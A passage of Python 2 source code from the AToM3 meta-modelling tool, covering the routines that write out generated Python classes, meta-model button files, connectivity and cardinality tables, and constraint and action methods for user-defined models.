file.write(" if counter > "+maxValue+":\n")
file.write(" return ( 'Number of "+objectClass+" objects exceeded!', '')\n")
if not minValue in ["n", "N", "m", "M"]:
file.write(" if counter < "+minValue+":\n")
file.write(" return ( 'Number of "+objectClass+" objects insuficient("+str(minValue)+" are needed)!', '')\n")
else:
file.write(" if counter == 0:\n")
file.write(" return ( 'Number of "+value[0]+" objects insuficient("+str(minValue)+" are needed)!', '')\n")
def visitorOnCardinality (self, file, UMLobject, function, param = None ):
"""
Generates constraints from the cardinality attributes found, in a 'visitor pattern way'
"""
counter = 0
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if type[0] == 'ATOM3Connection':
value = UMLobject.getAttrValue(attr).getValue() # obtain the value
if param:
function(file, value, counter, param )
else:
function(file, value, counter )
counter = counter + 1
elif type[0] == 'ATOM3List' and type[1] == 'ATOM3Connection':
items = UMLobject.getAttrValue(attr).getValue()
for item in items:
value = item.getValue()
if param != None:
function(file, value, counter, param)
else:
function(file, value, counter)
counter = counter+1
return counter
def genASGCode(self, cardConstObjects, ASGroot=None):
"""
Generates Python code for the ASGroot node
"""
if(not ASGroot):
ASGroot = self.ASGroot
fileName = "ASG_"+ASGroot.keyword_.toString()+".py"
if self.console: self.console.appendText('Generating file '+fileName+' in directory '+self.codeGenDir)
f = open( os.path.join( self.codeGenDir,fileName) , "w+t" )
f.write('"""\n')
f.write("__"+ fileName +"_____________________________________________________\n")
f.write("\n")
f.write("Automatically generated AToM3 ASGroot node (DO NOT MODIFY DIRECTLY)\n")
f.write("Author: "+USER_NAME+"\n")
f.write("Modified: "+time.asctime()+"\n")
f.write("__"+ len(fileName)*"_" +"_____________________________________________________\n")
f.write('"""\n')
f.write("from ASG import *\n")
f.write("from ATOM3Type import *\n")
self.importedTypes = [] # list where the necessary types will be placed
self.visitorOnAttributes( f, ASGroot, self.genImport)
# now write each type of the list to the file...
for typename in self.importedTypes:
f.write("from "+typename+" import *\n")
f.write("class ASG_"+ASGroot.keyword_.toString()+"(ASG, ATOM3Type):\n\n") # generate class definition
f.write(" def __init__(self, parent= None, ASGroot = None):\n") # declare init method
metaModelName = ASGroot.keyword_.toString() # get the metamodel name
f.write(" ASG.__init__(self, '"+metaModelName+"', ASGroot, ['ASG_"+ASGroot.keyword_.toString()+"'") # add also the own name (for hierarchical modelling)
# add the node types...
counter = 0
for nodeType in ASGroot.nodeTypes: # for each node type
for UMLobject in ASGroot.listNodes[nodeType]: # for each object
if UMLobject.keyword_: # Added 7 April 2003 by JL
f.write(" ,")
f.write("'"+UMLobject.keyword_.toString()+"'")
counter = counter + 1
f.write("])\n\n")
f.write(" ATOM3Type.__init__(self)\n")
self.genASGNodeCode(f, ASGroot, 1) # != None -> globalModel
f.write("\n\n")
f.close()
def genCodeFor ( self, entity, objsWithCardConstraints ):
"""
Generates Python code for the entity
"""
# check
if not entity.keyword_: # entity does not have a keyword, raise an error, we cannot generate code
tkMessageBox.showerror(
"Error: entity has no keyword!",
"Entity does not have a keyword, " + str(entity),
parent = self
)
return
# generate code for the ATOM3Links, because a graphical file must be generated
for attr in entity.generatedAttributes.keys():
type = entity.generatedAttributes[attr] # A tuple with the types...
if type[0] == 'ATOM3Link': # ey! an ATOM3Link has been found...
at3link = entity.getAttrValue(attr)
if at3link and not at3link.isNone(): # if it has some value...
entity.getAttrValue(attr).genGraphicalFile( self.codeGenDir, self.parent )
else:
tkMessageBox.showerror(
"Error: entity has no graphical appearance!",
"Entity "+entity.keyword_.toString()+" does not have a graphical appearance",
parent = self
)
return
fileName = entity.keyword_.toString()+".py" # Prepare file name, with the keyword
if self.console: self.console.appendText('Generating file '+fileName+' in directory '+self.codeGenDir)
filePath = os.path.join( self.codeGenDir, fileName)
f = open( filePath, "w+t") # open file name and print header
#f.write("# __"+ fileName +"_____________________________________________________\n")
f.write('"""\n')
f.write("__"+ fileName +"_____________________________________________________\n")
f.write("\n")
f.write("Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)\n")
f.write("Author: "+USER_NAME+"\n")
f.write("Modified: "+time.asctime()+"\n")
f.write("__"+ len(fileName)*"_" +"_____________________________________________________\n")
f.write('"""\n')
f.write("from ASGNode import *\n\n") # generate imports
f.write("from ATOM3Type import *\n\n") # generate imports
self.importedTypes = [] # list where the necessary types will be placed
self.visitorOnAttributes( f, entity, self.genImport) # generate import for ATOM3Types
# now write each type of the list to the file...
for typename in self.importedTypes:
f.write("from "+typename+" import *\n")
# Open the graphical appearence file (may not exist)
graphicName = "graph_"+entity.keyword_.toString()+".py"
if( os.path.exists( os.path.join( self.codeGenDir, graphicName ) ) ):
hasGraph = True
f.write("from graph_"+entity.keyword_.toString()+" import *\n")
# Not there... doh!
else:
hasGraph = False
# if we should generate graphics, then give a warning!
if self.genGraphics: # generate == Yes
tkMessageBox.showwarning(
"Warning: Undefined icon! ",
"Entity '"+entity.keyword_.toString()+"' does not have an icon",
parent = self
)
f.write("class "+entity.keyword_.toString()+"(ASGNode, ATOM3Type):\n\n") # generate class definition
f.write(" def __init__(self, parent = None):\n") # declare init method
f.write(" ASGNode.__init__(self)\n")
f.write(" ATOM3Type.__init__(self)\n")
if hasGraph: # then write down the class name
f.write(" self.graphClass_ = graph_"+entity.keyword_.toString()+"\n")
#f.write(" self.isGraphObjectVisual = "+str(entity.isGraphObjectVisual)+"\n")
# See HierarchicalASGNode.py for hierarchical code...
entity._generateHierarchicalSemanticCode(f, ' ')
self.genASGNodeCode(f, entity) # call method to generate the rest of the code
f.write("\n\n")
f.close()
def existGenerativeAttributes(self):
"""
Returns 1 if the actual model has some generative attributes...
"""
# first look in the ASGroot
if self.ASGroot.hasGenerativeAttributes(): return 1
# now look in each entity of the model...
for entype in self.ASGroot.listNodes.keys():
for entity in self.ASGroot.listNodes[entype]:
if entity.hasGenerativeAttributes(): return 1
return 0
def genButtons(self, ASGroot=None):
"""
generates the file which has the actions to create the defined entities.
"""
if(ASGroot == None):
ASGroot = self.ASGroot
# get the name from the model name...
nameButtonBar = ASGroot.keyword_.toString()+"_MM"
if self.console: self.console.appendText('Generating file '+nameButtonBar+'.py in directory '+self.codeGenDir+' (Meta-model file)')
file = open( os.path.join( self.codeGenDir,nameButtonBar+".py"), "w+t" )
# see if we have to import graph_ASG_<nameButtonBar>, or graph_ASG_UMLmetaMetaModel
# try to open the file to see if it exists
grFName = 'graph_ASG_'+ASGroot.keyword_.toString()
# check if a drawing was made, and if not, use the default drawing
# try to open it...
try:
f = open (grFName+'.py', "r+t")
except IOError: # not found, so use default drawing file
grFName = 'graph_ASG_ERmetaMetaModel'
else:
f.close()
file.write('"""\n')
file.write("__"+ nameButtonBar+".py______________________________________________________\n")
file.write("\n")
file.write("Automatically generated AToM3 MetaModel (DO NOT MODIFY DIRECTLY)\n")
file.write("Author: "+USER_NAME+"\n")
file.write("Modified: "+time.asctime()+"\n")
file.write("__"+ len(nameButtonBar+".py")*"_" +"______________________________________________________\n")
file.write('"""\n')
file.write('from ASG_'+ASGroot.keyword_.toString()+' import *\n') # the class of root node
file.write('from '+grFName+' import *\n') # the class of the graphic for the root node
file.write('from Tkinter import *\n')
file.write('from ATOM3TypeInfo import *\n')
file.write('from ATOM3String import *\n')
file.write('from StatusBar import *\n')
file.write('from ATOM3TypeDialog import *\n\n')
# import all the ASGNodes...
for UMLclass in ASGroot.nodeTypes:
for obj in ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003
file.write('from '+obj.keyword_.toString()+' import *\n')
# check if there exist the file with the graphical class
nameFile = "graph_"+obj.keyword_.toString()+".py"
try:
f = open (nameFile, "r+t")
except IOError:
pass
else:
f.close ()
file.write('from graph_'+obj.keyword_.toString()+' import *\n')
# generate function "createNewASGroot(self):"
file.write('def createNewASGroot(self):\n')
file.write(' return ASG_'+ASGroot.keyword_.toString()+'(self, None)\n\n')
# generate function "createModelMenu"
file.write('def createModelMenu(self, modelMenu):\n')
file.write(' "Creates a customized Model Menu for the actual formalism"\n')
# Modified by Denis Dube, summer 2004, why the heck do you declare a new modelMenu
# when your given one as a parameter? It definately doesn't work at all on my Win XP box
# if you do that.
#file.write(' modelMenu = Menu(self.mmtoolMenu, tearoff=0)\n')
for UMLclass in ASGroot.nodeTypes:
for obj in ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003
file.write(' modelMenu.add_command(label="New '
+obj.keyword_.toString()
+'", command=lambda x=self: x.createNew'
+obj.keyword_.toString()+'(x, 100, 100) )\n') #
# generate the function setConnectivity
self.genSetConnectivity(file)
# generate the functions 'createNew<class>(self, wherex, wherey):
for UMLclass in ASGroot.nodeTypes:
for obj in ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
file.write('def createNew'+obj.keyword_.toString()
+'(self, wherex, wherey, screenCoordinates = 1):\n')
file.write(' self.fromClass = None\n')
file.write(' self.toClass = None\n')
file.write(' # try the global constraints...\n')
file.write(' res = self.ASGroot.preCondition(ASG.CREATE)\n')
file.write(' if res:\n')
file.write(' self.constraintViolation(res)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' return\n\n')
file.write(' new_semantic_obj = '+obj.keyword_.toString()+'(self)\n')
file.write(' res = new_semantic_obj.preCondition ( ASGNode.CREATE )\n')
file.write(' if res: return self.constraintViolation(res)\n')
file.write(' new_semantic_obj.preAction ( ASGNode.CREATE ) \n\n')
file.write(' ne = len(self.ASGroot.listNodes["'+obj.keyword_.toString()+'"])\n')
file.write(' if new_semantic_obj.keyword_:\n')
file.write(' new_semantic_obj.keyword_.setValue(new_semantic_obj.keyword_.toString()+str(ne))\n')
file.write(' if screenCoordinates:\n')
file.write(' new_obj = graph_'+obj.keyword_.toString()+'(self.UMLmodel.canvasx(wherex), self.UMLmodel.canvasy(wherey), new_semantic_obj)\n')
file.write(' else: # already in canvas coordinates\n')
file.write(' new_obj = graph_'+obj.keyword_.toString()+'(wherex, wherey, new_semantic_obj)\n')
file.write(' new_obj.DrawObject(self.UMLmodel, self.editGGLabel)\n')
file.write(' self.UMLmodel.addtag_withtag("'+obj.keyword_.toString()+'", new_obj.tag)\n')
file.write(' new_semantic_obj.graphObject_ = new_obj\n')
file.write(' self.ASGroot.addNode(new_semantic_obj)\n')
file.write(' res = self.ASGroot.postCondition(ASG.CREATE)\n')
file.write(' if res:\n')
file.write(' self.constraintViolation(res)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' return\n\n')
file.write(' res = new_semantic_obj.postCondition(ASGNode.CREATE)\n')
file.write(' if res:\n')
file.write(' self.constraintViolation(res)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' return\n')
file.write(' new_semantic_obj.postAction(ASGNode.CREATE)\n\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' if self.editGGLabel :\n')
file.write(' self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.CREATE)\n')
file.write(' else:\n')
file.write(' self.statusbar.event(StatusBar.MODEL, StatusBar.CREATE)\n')
file.write(' return new_semantic_obj\n')
# generate also the function "createNewModel" to allow hierarchical Modelling
file.write('def createNew_Model(self, wherex, wherey, screenCoordinates = 1):\n')
file.write(' self.toClass = None\n')
file.write(' self.fromClass = None\n')
file.write(' new_semantic_obj = ASG_'+ASGroot.keyword_.toString()+'(self)\n')
file.write(' ne = len(self.ASGroot.listNodes["ASG_'+ASGroot.keyword_.toString()+'"])\n')
file.write(' if new_semantic_obj.keyword_:\n')
file.write(' new_semantic_obj.keyword_.setValue(new_semantic_obj.keyword_.toString()+str(ne))\n')
file.write(' if screenCoordinates:\n')
file.write(' new_obj = '+grFName+'(self.UMLmodel.canvasx(wherex), self.UMLmodel.canvasy(wherey), new_semantic_obj)\n')
file.write(' else: # already in canvas coordinates\n')
file.write(' new_obj = '+grFName+'(wherex, wherey, new_semantic_obj)\n')
file.write(' new_obj.DrawObject(self.UMLmodel, self.editGGLabel)\n')
file.write(' self.UMLmodel.addtag_withtag("ASG_'+ASGroot.keyword_.toString()+'", new_obj.tag)\n')
file.write(' new_semantic_obj.graphObject_ = new_obj\n')
file.write(' self.ASGroot.addNode(new_semantic_obj)\n')
file.write(' self.mode=self.IDLEMODE\n')
file.write(' if self.editGGLabel :\n')
file.write(' self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.CREATE)\n')
file.write(' else:\n')
file.write(' self.statusbar.event(StatusBar.MODEL, StatusBar.CREATE)\n')
file.write(' return new_semantic_obj\n')
# generate fillTypesInformation function
file.write('def fillTypesInformation(self):\n')
file.write(' objs = []\n')
itemList = self.typeList.getValue() # obtain the item list
for item in itemList: # obtain the value (ATOM3TypeInfo) of each item
file.write(' obj = ATOM3TypeInfo(self)\n')
file.write(' params = []\n')
value = item.getValue()
for param in value[2]: # if we have parameters
file.write(' param = ATOM3String("'+param.toString()+'")\n')
file.write(' params.append(param)\n')
file.write(' obj.setValue(("'+value[0]+'", "'+value[1]+'", params, '+str(value[3])+' ))\n')
file.write(' objs.append(obj)\n')
file.write(' self.typeList.setValue(objs)\n\n')
def genSetConnectivity(self, file):
"""
Generates the setConnectivity function in the file.
"""
file.write('def setConnectivity(self):\n')
indent = ' ' # set the indentation to be used in the function
self.__genConnectivityMap(file, indent)
file.write(indent+'\n')
self.__genCardinalityTable(file, indent)
file.write(indent+'\n')
self.__genEntitiesInMetaModel(file, indent)
file.write(indent+'\n')
def __reachesDirectly (self, nobj1, nobj2, listOfObjects, direc):
"""
Added 12 Sept 2002
Returns 1 if nobj1 can reach nobj2 directly.
nobj1 and nobj2 are strings.
listOfObjects is a list with the real objects
direc is the direction of the connection: 1 is from nobj1 ro nobj2, 0 is the reverse
"""
for obj in listOfObjects:
if obj.keyword_.toString() == nobj1: # we've found the object...
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection':
lc = obj.getAttrValue(attr).getValue()
for conn1 in lc:
name, direc1, min1, max1 = conn1.getValue() # unwrap it
if name == nobj2 and direc1[1] == direc: return 1
return 0
def __genConnectivityMap(self, file, indent):
"""
Generates code in the file to generate the 'ConnectivityMap' dictionary
"""
entities = {}
connections = [] # this will be a list with all the entities with connection possibilities...
for UMLclass in self.ASGroot.nodeTypes: # build the dicionary, search for 'entities'
for obj in self.ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
hasConns = 0
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3Connection' or (obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection'):
hasConns = 1
break
if hasConns: connections.append(obj)
entities[obj.keyword_.toString()] = {}
# initialize dictionary to void
for ent1 in entities.keys():
for ent2 in entities.keys():
entities[ent1][ent2] = []
for obj in connections: # for each element with connections...
#if obj.keyword_: # Added 7 April 2003 by JL
objName = obj.keyword_.toString() # get its name
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection':
lc = obj.getAttrValue(attr).getValue() # get the list of connections
for conn1 in lc: # for each connection...
name1, direc1, min1, max1 = conn1.getValue() # unwrap it
lc2 = []+lc
lc2.remove(conn1)
if name1 in entities.keys():
for conn2 in lc2:
name2, direc2, min2, max2 = conn2.getValue()
if name2 in entities[name1].keys() and name2 in entities.keys() and direc1 != direc2 and not self.__reachesDirectly(name1, name2, connections, direc2[1]): # last condition added 12 Sept 2002
ntuple = (objName, "self.createNew"+objName)
if direc1[1] == 1:
if not ntuple in entities[name1][name2]:
entities[name1][name2].append(ntuple)
else:
if not ntuple in entities[name2][name1]:
entities[name2][name1].append(ntuple)
# now, write the dictionary in the file...
for name1 in entities.keys():
file.write(indent+"self.ConnectivityMap['"+name1+"']={")
outcont = 0
for name2 in entities[name1].keys():
if outcont > 0: file.write("\n"+indent+" ,'"+name2+"': [")
else: file.write("\n"+indent+" '"+name2+"': [")
outcont = outcont + 1
count = 0
for element in entities[name1][name2]:
if count > 0: file.write(", ")
file.write("( '"+element[0]+"', "+element[1]+")")
count = count + 1
file.write("]")
file.write(" }\n")
def __genEntitiesInMetaModel(self, file, indent):
"""
Generates code in file to write the 'entitiesInMetaModel' list
"""
metaModelName = self.ASGroot.keyword_.toString()
file.write(indent+"self.entitiesInMetaModel['"+metaModelName+"']=[")
counter = 0
for entity1 in self.ASGroot.nodeTypes:
for obj1 in self.ASGroot.listNodes[entity1]:
if obj1.keyword_: # Added 7 April 2003 by JL
if counter > 0: file.write(", ")
file.write ('"'+obj1.keyword_.toString()+'"')
counter = counter + 1
file.write("]\n\n")
def __genCardinalityTable(self, file, indent):
"""
Generates code in file to write the 'CardinalityTable' dictionary
"""
cardTable = {}
# in this function we also include the filling of the dictionary self.CardinalityTable...
for entity1 in self.ASGroot.nodeTypes:
for obj1 in self.ASGroot.listNodes[entity1]:
if obj1.keyword_: # Added 7 April 2003 by JL
name1 = obj1.keyword_.toString()
cardTable[name1] = {}
for entity2 in self.ASGroot.nodeTypes:
for obj2 in self.ASGroot.listNodes[entity2]:
if obj2.keyword_: # Added 7 April 2003 by JL
name2 = obj2.keyword_.toString()
cardTable[name1][name2] = [] # Initialize to None
for UMLclass in self.ASGroot.nodeTypes: # build the dicionary, search for 'entities'
for obj in self.ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
objName = obj.keyword_.toString() # get the entity name
for attr in obj.generatedAttributes.keys(): # look for ATOM3Connections...
if obj.generatedAttributes[attr][0] == 'ATOM3List' and obj.generatedAttributes[attr][1] == 'ATOM3Connection':
lc = obj.getAttrValue(attr).getValue() # get the list of connections
for conn1 in lc:
name1, direc1, min1, max1 = conn1.getValue()
cardTable[objName][name1].append((min1, max1, direc1[0][direc1[1]]))
for UMLclass in self.ASGroot.nodeTypes:
for obj in self.ASGroot.listNodes[UMLclass]:
if obj.keyword_: # Added 7 April 2003 by JL
name1 = obj.keyword_.toString()
file.write(indent+"self.CardinalityTable['"+name1+"']={")
count = 0
for UMLclass1 in self.ASGroot.nodeTypes:
for obj2 in self.ASGroot.listNodes[UMLclass1]:
if obj2.keyword_: # Added 7 April 2003 by JL
name2 = obj2.keyword_.toString()
if count > 0: file.write("\n"+indent+" ,'"+name2+"': "+ str(cardTable[name1][name2]))
else: file.write("\n"+indent+" '"+name2+"': "+ str(cardTable[name1][name2]))
count = count + 1
file.write(" }\n")
def editTypes(self):
"""
Opens a dialog to edit the types available in the session. If the user creates a new one,
then calls the graph grammar to generate code for the type.
"""
from TypeCodeGen import *
ma = ATOM3TypeDialog(self, self.typeList, ATOM3TypeDialog.OPEN )# edit types...
# generate code for the edited type...
newTypes = self.typeList.getValue() # obtain the list of existing types
oldTypes = []
for name in self.types.keys():
className = str(self.types[name][0])
oldTypes.append(className[string.rfind(className,".")+1:])
newTypesNames = []
for type in newTypes: # search for new defined types
typeName = type.getValue()[1]
newTypesNames.append(typeName)
if not typeName in oldTypes: # This is a new Type!
self.GraphGrammars = [ TypeCodeGen(self)]
grs = GraphRewritingSys(self, self.GraphGrammars, type.typeModel )
grs.evaluate(stepByStep = 0, moveEntities = 1, execute = grs.SEQ_MANUAL, graphics = 0) # no graphics (the canvas with the model is closed!)
self.newTypes.append((type.getValue()[0], typeName, (), 1)) # add the new type to the list of newly created types
# delete the deleted types...
elements2delete = []
for nt in self.newTypes:
name, name, args, flag = nt
if not name in newTypesNames:
elements2delete.append(nt)
for delElem in elements2delete: self.newTypes.remove(delElem) # delete the element
for type in self.types.keys(): # remove all elements
del self.types[type]
self.fillDictionaryWithTypes() # fill the dictionary again with the types
def add2Types(self, ASGNodeType, oldName):
"""
check if the object whose name was oldName is included in the list of types, and if not, include it
"""
# create a new ATOM3TypeInfo to add it to the list
newType = ATOM3TypeInfo(self)
newType.setValue( (ASGNodeType.keyword_.toString(), ASGNodeType.keyword_.toString(), () ))
# generate code for the class...
self.genCodeFor( ASGNodeType )
# import the class file.
exec "from "+ASGNodeType.keyword_.toString()+" import *\n"
self.types[ASGNodeType.keyword_.toString()] = ( eval(ASGNodeType.keyword_.toString()), (self, ))
# see if the name has changed
if (oldName in self.types.keys()) and (oldName != ASGNodeType.keyword_.toString()):
del self.types[oldName]
os.remove( oldName+".py")
typesInList = self.typeList.getValue() # the ATOM3TypeInfo objects in the list
counter = 0
for typ in typesInList:
val = typ() # Get the objects value
if val[0] == oldName: # we have found it
typesInList[counter] = newType
break
counter = counter + 1
def newModeUMLrelationship(self):
"""
Enters in the mode NEWUMLrelationship
"""
self.mode = NEWUMLrelationship
def copyFromLHS(self):
"""
Performs the copying from the LHS of one rule. It takes this information from self.GGSemanticRule
Added 20/July/2002
"""
clonedObjects = []
# A list with the cloned objects
for nodeType in self.GGSemanticRule.LHS.listNodes.keys():
for node in self.GGSemanticRule.LHS.listNodes[nodeType]:
newObj = node.clone()
newObj.parent = self # change the object's parent to myself
newObj.editGGLabel = ASG.INRHS # This node is in RHS
newObj.GGset2Any = {} # reinitialize GG info
newObj.graphObject_ = newObj.graphClass_(node.graphObject_.x, node.graphObject_.y, newObj) # create the graphical object
#newObj.graphObject_.DrawObject(self.UMLmodel, self.editGGLabel)
#self.UMLmodel.addtag_withtag(nodeType, newObj.graphObject_)
try:
self.ASGroot.addNode(newObj)
except:
tkMessageBox.showerror(
"Copy LHS",
"ERROR: copy LHS failed since a formalism open in the LHS is"
+ " not currently open in the RHS\n\nPlease open it now...",
parent=self)
return
node.clonedObject = newObj # keep a pointer to the cloned object
clonedObjects.append(newObj)
# copy also the (semantic) connections
for obj in clonedObjects:
obj.in_connections_nw = []
for icn in obj.in_connections_:
obj.in_connections_nw.append(icn.clonedObject)
obj.in_connections_ = obj.in_connections_nw
obj.out_connections_nw = []
for icn in obj.out_connections_:
obj.out_connections_nw.append(icn.clonedObject)
obj.out_connections_ = obj.out_connections_nw
del obj.in_connections_nw
del obj.out_connections_nw
# Make sure that the RHS has the appropriate starting GG label #
maxEditLabel = 0
for nodeType in self.GGSemanticRule.RHS.listNodes.keys():
for node in self.GGSemanticRule.RHS.listNodes[nodeType]:
maxEditLabel = max(maxEditLabel, node.GGLabel.getValue())
self.GGSemanticRule.RHS.minimumGG = maxEditLabel + 1
# delete the pointer to the cloned object
for nodeType in self.GGSemanticRule.LHS.listNodes.keys():
for node in self.GGSemanticRule.LHS.listNodes[nodeType]:
del node.clonedObject
# show the copied objects in the canvas
self.ASGroot.writeContents(self, self.genGraphics, 1, clonedObjects)
def reDrawGGLabels(self):
"""
redraws the GGLabels of each drawn entity, if appropriate
"""
if self.editGGLabel:
for nt in self.ASGroot.listNodes.keys():
for node in self.ASGroot.listNodes[nt]:
if node.graphObject_:
node.graphObject_.drawGGLabel(self.UMLmodel)
for drawnAttribute in node.graphObject_.attr_display.keys():
if node.getAttrValue(drawnAttribute).isNone() and self.editGGLabel == ASG.INLHS :
node.graphObject_.ModifyAttribute(drawnAttribute, "<ANY>")
elif self.editGGLabel== ASG.INRHS: # Modified 22 July, JL
if node.GGset2Any.has_key(drawnAttribute):
if node.GGset2Any[drawnAttribute].Copy.getValue()[1]:
node.graphObject_.ModifyAttribute(drawnAttribute, "<COPIED>")
elif not node.GGset2Any[drawnAttribute].Specify.getValue()[4] in ["", "\n", None]:
node.graphObject_.ModifyAttribute(drawnAttribute, "<SPECIFIED>")
def drawEntity(self, semObject, className):
"""
draws an existing entity
"""
graphObj = semObject.graphObject_
if graphObj:
#print "<DEBUG> ATOM3.drawEntity() ", graphObj
graphObj.redrawObject(self.getCanvas(), self.editGGLabel)
# now evaluate ONLY the graphical constraints!
graphObj.postCondition(ASG.CREATE)
self.UMLmodel.addtag_withtag(className, graphObj.tag)
self.mode=self.IDLEMODE
def genASGNodeCode(self, f, UMLobject, isGlobalModel = None):
""" generates code for the lower meta-level of a user-defined entity.
- isGlobalModel may contain a list with the objects with cardinality constraints"""
self.theKeyword = None
f.write(" self.parent = parent\n")
# search for something that is of Attribute Type or List of Attribute
self.hasAppearance = None # flag that indicates if the entity has an attribute of type appearance
# if it has, it must have a keyword...
self.visitorOnAttributes( f, UMLobject, self.findKeywordAndIcons)
if self.hasAppearance and self.theKeyword == None: # ... check that it is the case...
tkMessageBox.showerror(
"need a keyword!",
"Entity "+UMLobject.keyword_.toString()+" did not define a keyword attribute",
parent = self
)
return 0
self.visitorOnAttributes( f, UMLobject, self.writeCreation)
# fill the 'generatedAttributes' dictionary
f.write(" self.generatedAttributes = {")
self.visitorOnAttributes( f, UMLobject, self.writeGeneratedDictionary)
f.write(" }\n")
# fill the 'realOrder' list
f.write(" self.realOrder = [")
self.visitorOnAttributes( f, UMLobject, self.writeRealOrderList)
f.write("]\n")
# fill the 'directEditing' list (Added 31 July 2002, by JL)
f.write(" self.directEditing = [")
self.visitorOnAttributes( f, UMLobject, self.writeDirectEditingList)
f.write("]\n")
#
# Generate the clone function
#
f.write(" def clone(self):\n")
if isGlobalModel != None: # we don't clone whole models!!
#f.write(" cloneObject = ASG_"+ UMLobject.keyword_.toString() +"( self.parent )\n")
#f.write(" cloneObject.listNodes = copy.copy(self.listNodes)\n")
f.write(" return self\n")
else:
f.write(" cloneObject = "+ UMLobject.keyword_.toString() +"( self.parent )\n")
f.write(" for atr in self.realOrder:\n")
f.write(" cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )\n")
if self.theKeyword:
f.write(" cloneObject.keyword_ = cloneObject."+self.theKeyword+"\n")
if isGlobalModel == None:
f.write(" ASGNode.cloneActions(self, cloneObject)\n\n")
f.write(" return cloneObject\n") # changed 16 July 2002
#
# Generate the copy function
#
f.write(" def copy(self, other):\n")
f.write(" ATOM3Type.copy(self, other)\n")
f.write(" for atr in self.realOrder:\n")
f.write(" self.setAttrValue(atr, other.getAttrValue(atr) )\n")
if self.theKeyword:
f.write(" self.keyword_ = self."+self.theKeyword+"\n")
# only if the object is a descendant of ASGNode
if isGlobalModel == None:
f.write(" ASGNode.copy(self, other)\n\n")
# if we are an ASG class, must override the open() method from ATOM3Type
if isGlobalModel != None:
f.write(" def open(self, parent, topWindowParent):\n")
#f.write(" ATOM3Type.show(self, parent, topWindowParent)\n")
f.write(" from ATOM3 import *\n")
f.write(" a = ATOM3(topWindowParent, '"+UMLobject.keyword_.toString()+"', 0, 1, self)\n")
f.write(" #self.writeContents(a)\n")
f.write(" return a\n")
# Generate code for the constraints...
f.write(" def preCondition (self, actionID, * params):\n")
self.visitorOnConstraints ( "PREcondition", f, UMLobject, self.writeActionConstraint )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.preCondition(actionID, params)\n")
f.write(" else: return None\n")
f.write(" def postCondition (self, actionID, * params):\n")
self.visitorOnConstraints ( "POSTcondition", f, UMLobject, self.writeActionConstraint )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.postCondition(actionID, params)\n")
f.write(" else: return None\n")
self.visitorOnConstraints ( "", f, UMLobject, self.writeConstraintCode )
# Local methods to generate the actions code...
def writeActionCode ( file, value, unUsed):
""" Writes out the action code """
tempCode = value[4]
if(tempCode == None):
return
tempCode = tempCode.replace( '\n', '')
tempCode = tempCode.replace( ' ', '')
tempCode = tempCode.replace( '\t', '')
tempCode = tempCode.replace( '\r', '')
if(tempCode != ''):
file.write (" def "+value[0]+"(self, params):\n")
file.write (" "+string.replace(value[4],'\n', '\n '))
file.write ("\n\n")
def visitorOnActions ( which, file, UMLobject, function ):
""" Generates code for actions, in a 'visitor' pattern way """
for attr in UMLobject.generatedAttributes.keys():
type = UMLobject.generatedAttributes[attr] # A tuple with the types...
if( type[0] == 'ATOM3Action' ):
value = UMLobject.getAttrValue(attr).getValue() # obtain the value
function(file, value, which)
elif( type[0] == 'ATOM3List' and type[1] == 'ATOM3Action' ):
items = UMLobject.getAttrValue(attr).getValue()
for item in items:
value = item.getValue()
function(file, value, which)
def writeAction ( file, value, which):
""" Writes part of the function to evaluate local actions """
listAct, selAct = value[3]
listKnd, selKnd = value[2]
# Abort if there's no code...
tempCode = value[4]
if(tempCode == None):
return
tempCode = tempCode.replace( '\n', '')
tempCode = tempCode.replace( ' ', '')
tempCode = tempCode.replace( '\t', '')
tempCode = tempCode.replace( '\r', '')
if(len(tempCode) == 0):
return
# Filter to make sure at least one actionID is selected
if( listKnd[selKnd] == which
and filter( lambda item: item == True, selAct ) ):
# iterate on the specified event...
file.write(" if actionID == ")
conta = 0
writed = 0
for event in selAct:
if event == 1:
if not writed:
file.write("self."+listAct[conta])
else:
file.write(" or actionID == self."+listAct[conta])
writed = 1
conta = conta + 1
file.write(":\n")
file.write(" self."+value[0]+"(params)\n")
# Generate code for the actions... (added by Denis Feb 26,2005)
f.write(" def preAction (self, actionID, * params):\n")
visitorOnActions ( "PREaction", f, UMLobject, writeAction )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.preAction(actionID, params)\n")
f.write(" else: return None\n")
f.write(" def postAction (self, actionID, * params):\n")
visitorOnActions ( "POSTaction", f, UMLobject, writeAction )
f.write(" if self.graphObject_:\n")
f.write(" return self.graphObject_.postAction(actionID, params)\n")
f.write(" else: return None\n")
visitorOnActions ( "", f, UMLobject, writeActionCode )
def moveBox (self, x, y):
"""
method to move a graphical node in the canvas, called by the mouseMove method.
"""
sel = self.UMLmodel.find_withtag("selected") # find the selected 'box'
tag = self.UMLmodel.gettags(sel[0])[0]
if sel and tag and VisualObj.Tag2ObjMap.has_key(tag):
# 1st. try the global constraints...
# modified 07-march-03: added x, y, initDragX, initDragY parameters
